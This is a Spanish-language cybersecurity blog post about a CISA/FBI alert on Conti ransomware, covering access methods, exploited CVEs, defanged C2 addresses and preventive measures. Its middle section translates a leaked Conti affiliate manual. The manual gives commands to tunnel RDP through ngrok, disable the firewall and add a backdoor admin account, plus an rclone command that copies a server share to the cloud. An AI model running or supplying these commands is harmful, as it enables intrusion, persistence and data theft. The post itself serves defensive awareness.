Alerta! Ransomware “Conti”, medidas preventivas y publicación de las herramientas usadas por los atacantes

Cesar Farro
8 min readSep 23, 2021

CISAs (Cybersecurity Infraestucure Security Agency) y el FBI el 22 de setiembre ha publicado una alerta sobre la propación del Ransomware Conti en más de 400 organizaciones estadounidenses e internacionales.

Acciones rápidas:

  1. -Utilizar autenticación Multifactor MFA.
  2. Segmentar y segregar redes y funciones.
  3. Actualize su sistema operativo y software.

Metodos de Acceso Inicial:

El Ransomware Conti esta desarrollado bajo el modelo Raas (Ransomware as a Service), los métodos de acceso a inicial a las redes de las victimas:

  1. Campañas de spearphishing que utilizan correos electrónicos personalizados que contienen archivos adjuntos maliciosos. Los archivos adjuntos maliciosos de Word contienen scripts + malware (TrickBot e IcedID, Cobalt Strike, para el movimiento lateral)
  2. Credenciales de Protocolo de escritorio remoto (RDP) robadas o débiles.
  3. Llamadas telefónicas. ( Algo nuevo!!!!)
  4. Software falso promocionado a través de la optimización de motores de búsqueda ;Otras redes de distribución de malware (por ejemplo, ZLoader).
  5. Vulnerabilidades comunes en activos externos, aqui hacer revisiones periódicas frecuentes a todos sus activos expuestos.

Vulnerabilidades aprovechadas en la red Interna:

Los actores del Ransomware Conti también explotan vulnerabilidades en activos no parchados, para moverse en la red interna realizando movimientos laterales, como:

  • 2017 vulnerabilidades del servidor Microsoft Windows Server Message Block.
  • Vulnerabilidad “PrintNightmare” (CVE-2021–34527) en el servicio de cola de impresión de Windows.
  • Vulnerabilidad “Zerologon” (CVE-2020–1472) en sistemas Microsoft Active Directory Domain Controller.

IOCs (Indicadores de Compromiso):

De los artefactos filtrados se han identificado cuatro direcciones IP del servidor Cobalt Strike que los actores del Ransomware Conti usaban anteriormente para comunicarse con su servidor de C2 (comando y control):

  • 162.244.80[.]235
  • 85.93.88[.]165
  • 185.141.63[.]120
  • 82.118.21[.]1

Capturas de pantalla de las direcciones IP donde la banda de Conti aloja los servidores de comando y control de Cobalt Strike, que los miembros afiliados de Conti utilizan para acceder a las redes de la empresa hackeadas.

Fuentes: https://therecord.media y post original.

Afiliado de ransomware descontento filtra los manuales técnicos del grupo Conti Ransom:

De acuerdo a la información de Therecord, se filtro las conversaciones de unos de las personas afiliados a este modelo RaaS (Ransomware as a Service), donde indica que reclutan penetration testers para probar Active Directory de las redes.

Fuente: TheRECORD

También se comparten capturas de pantalla de las direcciones IP que el grupo de atacantes de la familia Conti alojan servidores de Comando y Control de Cobalt Strike que los miembros afiliados de Conti utilizan para acceder a las redes de la empresa pirateadas.

Fuente: TheRECORD

De la primera captura se puede observar que en un 2do post el usuario m1Geelka, publica Manuals and Software:

Manuales y Software utilizados:

La pesona comparte un archivo que contiene manuales y software que usa este grupo de ransom #Conti:

El enlace en sendspace.com/file/qmgq3v a la fecha ya esta desactivado.Sin embargo en algunos foros el archivo esta filtrado, los manuales y software que usa este grupo, la mayoria de material esta en ruso, pero sí te permite entender algunas herramientas y procedimientos que les compartes a sus afiliados. Agradecer a Andres Morales por esta colaboración.

Por ejemplo, herramienta: Pentest SQL

Fuente: https://github.com/NetSPI/PowerUpSQL/wiki

Herramienta: RDP NGROK

En las otras herramientas observo que hay una de RDP NGROK, el procedimiento esta en ruso, vamos intentar traducirlo y ver que trata de ejecutar, archivo original:

La traducción a español podría tener errores pero nos permite tener una idea general:

Inicio del manual “RDP NGROK.txt”:

Regístrese en https://ngrok.com/
- Descarga ngrok.exe y cárgalo en la carretilla

En el menú del panel de la cuenta de ngrok, seleccione “Su token de autenticación”.
Copie el comando con el token (sin ./). Por ejemplo:
ngrok authtoken 1vZgA1BbLWyhSjIE0f36QG6derd_5fXEPgPp8ZLxbUg

- Entramos en la carretilla y escribimos:
shell ngrok authtoken 1vZgA1BbLWyhSjIE0f36QG6derd_5fXEPgPp8ZLxbUg

- Lanzamos un túnel al puerto RDP:
shell ngrok tcp 3389

- Abrimos el RDP en carretilla:
shell reg agregar “HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server” / v fDenyTSConnections / t REG_DWORD / d 0 / f && reg agregar “HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server” / v fAllowToGetHelp 1 / f

shell NetSh Advfirewall desactivó el estado de todos los perfiles //desactiva el fw, perfiles.

shell netsh advfirewall firewall set rule group = “escritorio remoto” nueva habilitación = Sí

shell netsh firewall set service type = remotedesktop mode = enable

- Podemos agregar un usuario separado bajo ngrok: //agrega usuario Admin
shell net usuario Admin Password1 / add
Shell net localgroup Administradores Admin / agregar //grupo Administrdores

- Vaya al panel de la cuenta ngrok — compruebe el túnel (“Puntos finales — Estado”).
Copie IP: puerto desde allí y vaya a cualquier cliente RDP. Nos conectamos (también puedes usar la cuenta que creamos).

Fuente: RDP NGROK.txt (Traducio a español, con errores de la traducción)

Herramienta: RCLONE

Usa rclone para llevarse los archivos de la red interna hacia la nube:

shell rclone.exe copy “\\trucamtldc01\E$\Data” remote:Data -q — ignore-existing — auto-confirm — multi-thread-streams 12 — transfers 12

################

Medidas Preventivas:

Finalmente, compartiré algunas medidas preventivas con el objetivo de protegernos frente a ransomware:

  1. Backup, Backup, Restore, Restore.
  2. Utilizar MFA autenticación multifactor.
  3. Implementar Segmentación de la red y filtrar el tráfico.
  4. Filtre el tráfico de la red para prohibir las comunicaciones de entrada y salida con direcciones IP maliciosas conocidas.
  5. Habilite filtros de spam sólidos para evitar que los correos electrónicos de phishing lleguen a los usuarios finales. Filtre los correos electrónicos que contengan archivos ejecutables para evitar que lleguen a los usuarios finales.
  6. Implemente un programa de capacitación de usuarios para que reporten y no ingresen a sitios web maliciosos o abrir archivos adjuntos maliciosos.
  7. Filtro URL y contenido Web: Implemente una lista de bloqueo y / o lista de permisos de URL para evitar que los usuarios accedan a sitios web maliciosos.
  8. Vulnerabilidades:
    -Implemente un proceso de Gestión de vulnerabilidades, que permite buscar regularmente vulnerabilidades y mantenga el software de S. O., aplicaicones, actualizado.
  9. Anti Malware:
    -Active Agentes de seguridad EDR/XDR en los servidores críticos y estaciones que permita reconocer y bloquear actividada maliciosa utilizando no solamente firmas si no teambien utilizando tecnicas basadas en comportamiento usando algoritmos de IA.
  10. Sistema Operativos:
    Implemente un proceso de gestión de parches para sistemas operativos, acualice el software y los sistemas operativos, las aplicaciones y el firmware de los activos de red de manera oportuna.
    Considere la posibilidad de utilizar un sistema de gestión de parches centralizado.
  11. Software/ Aplicaciones:
    -Elimine aplicaciones innecesarias y aplique controles.
    -Elimine cualquier aplicación que no se considere necesaria para las operaciones diarias.
    - Investigue cualquier software no autorizado, especialmente el software de escritorio remoto o de supervisión y gestión remotas.
    - Implementar la lista de permisos de aplicaciones, que solo permite que los sistemas ejecuten programas conocidos y permitidos por la política de seguridad de la organización.

Anexo 1 :

Vulnerabilidades utilizadas en la red interna para movimiento lateral:

1.- 2017 vulnerabilidades del servidor Microsoft Windows Server Message Block.

MS17–010: Actualización de seguridad para Windows Server de SMB: 14 de marzo de 2017

Permite la ejecución remota de código si un atacante envía mensajes especialmente diseñados a un servidor de Microsoft Server Message Block 1.0 (SMBv1).

Actualizaciones de Seguridad:

Fuente: https://support.microsoft.com/es-es/topic/ms17-010-actualizaci%C3%B3n-de-seguridad-para-windows-server-de-smb-14-de-marzo-de-2017-435c22fb-5f9b-f0b3-3c4b-b605f4e6a655

2. Vulnerabilidad “PrintNightmare” (CVE-2021–34527) en el servicio de cola de impresión de Windows.

Fuente: https://es-la.tenable.com/blog/cve-2021-34527-microsoft-releases-out-of-band-patch-for-printnightmare-vulnerability-in-windows?tns_redirect=true

En el momento en que se publicó esta publicación de blog, hay 53 scripts de explotación de PoC públicos para PrintNightmare en GitHub.

Fuente: https://github.com/search?q=CVE-2021-1675+OR+CVE-2021-34527

Security Updates:

Fuente: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527

3. Vulnerabilidad “Zerologon” (CVE-2020–1472) en sistemas Microsoft Active Directory Domain Controller.

Tenable:

Fuente: https://es-la.tenable.com/blog/cve-2020-1472-zerologon-vulnerability-in-netlogon-could-allow-attackers-to-hijack-windows?tns_redirect=true

Security Updates:

Fuente: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472

Anexo 2 :

Reputación de direcciones IP involucradas

Vamos a ver más detalle sobre estas direcciones IP al 23 de setiembre como fuente #virustotal.com and #shodan:

  • 82.118.21[.]1

Fuentes:

(1) : Alerta CISA (Cybersecurity Infraestucure Security Agency) y el FBI), AA21–265A:

https://us-cert.cisa.gov/ncas/alerts/aa21-265a

(2) Therecord.media, Afiliado de ransomware descontento filtra los manuales técnicos de la pandilla Conti

https://therecord.media/disgruntled-ransomware-affiliate-leaks-the-conti-gangs-technical-manuals/

(3) Vulnerabilidad CVE-2020–1472 Zerologon, https://www.tenable.com/cve/CVE-2020-1472

(4) Microsoft Security Updates: CVE-2020–1472, https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472

(5) PowerUpSQL, A PowerShell Toolkit for attacking SQL Server

https://github.com/NetSPI/PowerUpSQL/wiki

--

--

Cesar Farro

Blog de #ciberseguridad, Hacking, Recomendaciones de Protección y Buenas Practicas para las Empresas y Personas